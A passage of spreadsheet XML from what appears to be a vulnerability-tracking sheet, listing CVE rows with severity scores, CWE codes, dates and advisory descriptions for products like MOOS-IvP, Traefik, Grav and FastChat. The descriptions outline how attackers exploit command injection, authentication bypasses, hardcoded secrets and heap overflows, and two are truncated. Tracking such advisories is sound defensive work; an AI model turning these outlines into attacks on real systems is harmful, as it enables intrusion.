          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J511" s="5" t="inlineStr"/>
      <c r="K511" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L511" s="5" t="inlineStr">
        <is>
          <t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can obtain the SSH service account credentials and passwords for the SmartIT Agent directly from the application source code.</t>
        </is>
      </c>
      <c r="M511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85146</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85148</t>
        </is>
      </c>
      <c r="C512" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D512" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E512" s="5" t="inlineStr"/>
      <c r="F512" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="inlineStr"/>
      <c r="I512" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L512" s="5" t="inlineStr">
        <is>
          <t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can exploit a fixed password to remotely access user hosts.</t>
        </is>
      </c>
      <c r="M512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85148</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85154</t>
        </is>
      </c>
      <c r="C513" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D513" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E513" s="5" t="inlineStr"/>
      <c r="F513" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="inlineStr"/>
      <c r="I513" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L513" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains an authentication failure vulnerability where the video_id_hash credential is a non-expiring, non-revocable bearer token that grants full administrator session access to the video owner's account. Attackers who obtain a video_id_hash can replay it indefinitely to authenticate as the video owner with full privileges, and the credential remains valid even after the owner changes their password.</t>
        </is>
      </c>
      <c r="M513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85154</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85183</t>
        </is>
      </c>
      <c r="C514" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D514" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E514" s="5" t="inlineStr"/>
      <c r="F514" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="inlineStr"/>
      <c r="I514" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr">
        <is>
          <t>CWE-1385</t>
        </is>
      </c>
      <c r="L514" s="5" t="inlineStr">
        <is>
          <t>Taipy configures its socket.io server with wildcard CORS origin and credential flag enabled, allowing any web page to establish credentialed WebSocket connections to victim applications. Attackers can open socket.io sessions from arbitrary domains and invoke state variable modifications and action callbacks without CSRF protection.</t>
        </is>
      </c>
      <c r="M514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85183</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85391</t>
        </is>
      </c>
      <c r="C515" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D515" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E515" s="5" t="inlineStr"/>
      <c r="F515" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G515" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H515" s="5" t="inlineStr"/>
      <c r="I515" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L515" s="5" t="inlineStr">
        <is>
          <t>Peppermint through 0.5.5 contains a hardcoded JWT signing secret in docker-compose.yml that allows unauthenticated attackers to forge session tokens for any account. Attackers can use the published secret to mint valid tokens for arbitrary user IDs and access protected endpoints without credentials.</t>
        </is>
      </c>
      <c r="M515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85391</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85424</t>
        </is>
      </c>
      <c r="C516" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D516" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E516" s="5" t="inlineStr"/>
      <c r="F516" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="inlineStr"/>
      <c r="I516" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L516" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 lacks authentication in the wire protocol, allowing unauthenticated clients to connect with full publish, subscribe, and database clear privileges. Attackers can bypass the compile-time protocol string check and connect with arbitrary client names to execute privileged operations including DB_CLEAR which resets all variables and clears client mail queues.</t>
        </is>
      </c>
      <c r="M516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85424</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85425</t>
        </is>
      </c>
      <c r="C517" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D517" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E517" s="5" t="inlineStr"/>
      <c r="F517" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="inlineStr"/>
      <c r="I517" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L517" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP iSay through 24.8.1 contains a remote code execution vulnerability in the SAY_MOOS variable handler that passes unsanitized text to a shell command. Attackers can publish SAY_MOOS messages containing backticks or command substitution syntax to execute arbitrary commands as the iSay process user.</t>
        </is>
      </c>
      <c r="M517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85425</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85426</t>
        </is>
      </c>
      <c r="C518" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D518" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E518" s="5" t="inlineStr"/>
      <c r="F518" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="inlineStr"/>
      <c r="I518" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L518" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP uMemWatch through 24.8.1 constructs shell commands from attacker-chosen MOOS client names without sanitization. Attackers can inject shell metacharacters into client names to execute arbitrary commands as the uMemWatch process user through unquoted redirection targets in system calls.</t>
        </is>
      </c>
      <c r="M518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85426</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85428</t>
        </is>
      </c>
      <c r="C519" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D519" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E519" s="5" t="inlineStr"/>
      <c r="F519" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="inlineStr"/>
      <c r="I519" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L519" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains an authentication bypass vulnerability in the optional MOOSDB HTTP server that allows unauthenticated clients to write variables. Attackers can send HTTP requests with variable names and values to the MOOSDB HTTP server port to modify MOOS variables including actuator and override commands without authentication.</t>
        </is>
      </c>
      <c r="M519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85428</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85433</t>
        </is>
      </c>
      <c r="C520" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D520" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E520" s="5" t="inlineStr"/>
      <c r="F520" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="inlineStr"/>
      <c r="I520" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L520" s="5" t="inlineStr">
        <is>
          <t>MOOS essential-moos pShare through 10.0.1 fails to properly authorize PSHARE_CMD messages, allowing any publisher to reconfigure network routes and listeners at runtime. Attackers can send crafted PSHARE_CMD messages with cmd=output or cmd=input parameters to open new listeners on arbitrary addresses and redirect or duplicate bus traffic to attacker-controlled destinations.</t>
        </is>
      </c>
      <c r="M520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85433</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85434</t>
        </is>
      </c>
      <c r="C521" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D521" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E521" s="5" t="inlineStr"/>
      <c r="F521" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="inlineStr"/>
      <c r="I521" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L521" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP uFldShoreBroker through 24.8.1 fails to verify node ping authenticity before creating outbound bridge routes. Attackers can publish NODE_BROKER_PING messages with crafted HostRecord data to redirect bridged variables to attacker-controlled addresses.</t>
        </is>
      </c>
      <c r="M521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85434</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85435</t>
        </is>
      </c>
      <c r="C522" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D522" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E522" s="5" t="inlineStr"/>
      <c r="F522" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="inlineStr"/>
      <c r="I522" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L522" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP u</t>
        </is>
      </c>
      <c r="M522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85435</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85437</t>
        </is>
      </c>
      <c r="C523" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D523" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E523" s="5" t="inlineStr"/>
      <c r="F523" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="inlineStr"/>
      <c r="I523" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L523" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 contains multiple buffer overflow vulnerabilities in IvP function string decoders that trust attacker-controlled length fields without validation. Attackers can craft malicious encoded strings with mismatched declared and actual field lengths to overflow heap and stack buffers, potentially achieving remote code execution through MOOS variables or alog files.</t>
        </is>
      </c>
      <c r="M523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85437</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85438</t>
        </is>
      </c>
      <c r="C524" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D524" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E524" s="5" t="inlineStr"/>
      <c r="F524" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="inlineStr"/>
      <c r="I524" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L524" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP t</t>
        </is>
      </c>
      <c r="M524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85438</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85440</t>
        </is>
      </c>
      <c r="C525" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D525" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E525" s="5" t="inlineStr"/>
      <c r="F525" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="inlineStr"/>
      <c r="I525" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L525" s="5" t="inlineStr">
        <is>
          <t>MOOS core-moos through 10.4.0 contains a pre-authentication heap overflow vulnerability in MOOSCommPkt packet handling that allows remote attackers to write arbitrary data by declaring a negative packet length. Attackers can exploit the signed integer check in InflateTo() and negative size conversion in recv() to overflow a four-byte heap buffer during the HandShake phase before authentication.</t>
        </is>
      </c>
      <c r="M525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85440</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85595</t>
        </is>
      </c>
      <c r="C526" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D526" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E526" s="5" t="inlineStr"/>
      <c r="F526" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="inlineStr"/>
      <c r="I526" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L526" s="5" t="inlineStr">
        <is>
          <t>Traefik versions before v2.11.55 and versions v3.0.0 through v3.7.10 contain an authentication bypass vulnerability in the digestAuth middleware where unknown usernames receive an empty secret instead of rejection. Attackers can compute a valid digest response using the empty secret and arbitrary credentials to bypass authentication on any digestAuth-protected route without a valid username or password.</t>
        </is>
      </c>
      <c r="M526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85595</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85602</t>
        </is>
      </c>
      <c r="C527" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D527" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E527" s="5" t="inlineStr"/>
      <c r="F527" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="inlineStr"/>
      <c r="I527" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="L527" s="5" t="inlineStr">
        <is>
          <t>The Grav Form plugin (getgrav/grav-plugin-form) versions 8.0.6 through 9.1.19 select the reCAPTCHA version to validate based solely on which response field key is present in the submitted payload. On a site configured for reCAPTCHA v3, an anonymous attacker can place their v3 token under the v2 field name (g-recaptcha-response instead of token), causing validation to use the v2 branch, which never applies the score threshold or verifies the expected action. This results in a complete bypass of reCAPTCHA v3 bot protection. The issue is fixed in version 9.1.20.</t>
        </is>
      </c>
      <c r="M527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85602</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85663</t>
        </is>
      </c>
      <c r="C528" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D528" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E528" s="5" t="inlineStr"/>
      <c r="F528" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="inlineStr"/>
      <c r="I528" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L528" s="5" t="inlineStr">
        <is>
          <t>Aim 3.29.1 remote tracking server fails to authenticate requests and dispatches arbitrary methods through getattr without allowlist validation. Unauthenticated attackers can register clients, instantiate Repo resources, and invoke arbitrary methods to read experiments or delete runs.</t>
        </is>
      </c>
      <c r="M528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85663</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85667</t>
        </is>
      </c>
      <c r="C529" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D529" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E529" s="5" t="inlineStr"/>
      <c r="F529" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="inlineStr"/>
      <c r="I529" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L529" s="5" t="inlineStr">
        <is>
          <t>xiaobei through 5.5.2 fails to implement authentication or signature validation on webhook endpoints, allowing unauthenticated attackers to inject arbitrary messages into the agent pipeline. Attackers can publish malicious messages via the /webhook_worktool handler and exploit unvalidated media URL fetching to perform server-side request forgery against internal services.</t>
        </is>
      </c>
      <c r="M529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85667</t>
        </is>
      </c>
    </row>
    <row r="530">
      <c r="A530" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85672</t>
        </is>
      </c>
      <c r="C530" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D530" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E530" s="5" t="inlineStr"/>
      <c r="F530" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G530" s="5" t="inlineStr"/>
      <c r="H530" s="5" t="inlineStr"/>
      <c r="I530" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J530" s="5" t="inlineStr"/>
      <c r="K530" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L530" s="5" t="inlineStr">
        <is>
          <t>zerox 1.1.20 contains an OS command injection vulnerability in the file download mechanism where the temporary file extension derived from document URLs is interpolated unsanitized into shell commands executed by poppler utilities. Attackers can craft document URLs with malicious file extensions containing command substitution syntax to execute arbitrary OS commands before document processing occurs.</t>
        </is>
      </c>
      <c r="M530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85672</t>
        </is>
      </c>
    </row>
    <row r="531">
      <c r="A531" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85695</t>
        </is>
      </c>
      <c r="C531" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D531" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E531" s="5" t="inlineStr"/>
      <c r="F531" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G531" s="5" t="inlineStr"/>
      <c r="H531" s="5" t="inlineStr"/>
      <c r="I531" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J531" s="5" t="inlineStr"/>
      <c r="K531" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L531" s="5" t="inlineStr">
        <is>
          <t>FastChat contains an authentication bypass vulnerability in the /register_worker endpoint that allows unauthenticated attackers to register arbitrary worker addresses and perform server-side request forgery. Attackers can register malicious workers under victim model names to intercept user prompts, images, and responses, or probe internal network ports across the worker mesh.</t>
        </is>
      </c>
      <c r="M531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85695</t>
        </is>
      </c>
    </row>
    <row r="532">
      <c r="A532" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85696</t>
        </is>
      </c>
      <c r="C532" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D532" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E532" s="5" t="inlineStr"/>
      <c r="F532" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G532" s="5" t="inlineStr"/>
      <c r="H532" s="5" t="inlineStr"/>
      <c r="I532" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J532" s="5" t="inlineStr"/>
      <c r="K532" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L532" s="5" t="inlineStr">
        <is>
          <t>SadTalker contains an OS command injection vulnerability in the video muxing process where uploaded audio filenames are interpolated into ffmpeg commands without proper escaping. Attackers can upload audio files with shell metacharacters in the filename to break out of quoted arguments and execute arbitrary system commands when video generation occurs.</t>
        </is>
      </c>
      <c r="M532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85696</t>
        </is>
      </c>
    </row>
    <row r="533">
      <c r="A533" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86121</t>
        </is>
      </c>
      <c r="C533" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D533" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E533" s="5" t="inlineStr"/>
      <c r="F533" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G533" s="5" t="inlineStr"/>
      <c r="H533" s="5" t="inlineStr"/>
      <c r="I533" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J533" s="5" t="inlineStr"/>
      <c r="K533" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L533" s="5" t="inlineStr">
        <is>
          <t>Cua computer-server versions before 0.3.42 skip authentication when the CONTAINER_NAME environment variable is unset and bind to all interfaces by default, allowing unauthenticated attackers to execute arbitrary commands. Attackers can reach TCP port 8000 to run shell commands via the run_command endpoint, read and write arbitrary files through file operation endpoints, and access interactive PTY shells without authentication.</t>
        </is>
      </c>
      <c r="M533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86121</t>
        </is>
      </c>
    </row>
    <row r="534">
      <c r="A534" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86184</t>
        </is>
      </c>
      <c r="C534" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D534" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E534" s="5" t="inlineStr"/>
      <c r="F534" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G534" s="5" t="inlineStr"/>
      <c r="H534" s="5" t="inlineStr"/>
      <c r="I534" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
